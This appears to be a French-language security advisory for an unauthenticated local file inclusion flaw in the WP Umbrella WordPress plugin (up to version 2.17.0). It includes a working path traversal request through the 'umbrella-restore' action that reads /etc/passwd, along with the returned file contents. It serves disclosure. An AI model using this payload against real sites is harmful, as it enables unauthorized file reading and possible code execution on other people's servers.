
WP Umbrella: Mise à jour Sauvegarde Restauration & Surveillance <= 2.17.0 - Inclusion de fichier local non authentifié
WP Umbrella : Mise à jour, sauvegarde, restauration et surveillance <= 2.17.0 - Inclusion de fichier local non authentifiée
Le plugin WP Umbrella : Mise à jour, sauvegarde, restauration et surveillance pour WordPress est vulnérable à l'inclusion de fichier local dans toutes les versions jusqu'à la version 2.17.0 incluse via le paramètre 'filename' de l'action 'umbrella-restore'. Cela permet à des attaquants non authentifiés d'inclure et d'exécuter des fichiers arbitraires sur le serveur, permettant l'exécution de tout code PHP présent dans ces fichiers. Cela peut être utilisé pour contourner les contrôles d'accès, obtenir des données sensibles ou réaliser une exécution de code dans les cas où des images et d'autres types de fichiers « sûrs » peuvent être téléchargés et inclus.
https://wp-dev.ddev.site/?umbrella-restore=1&filename=../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin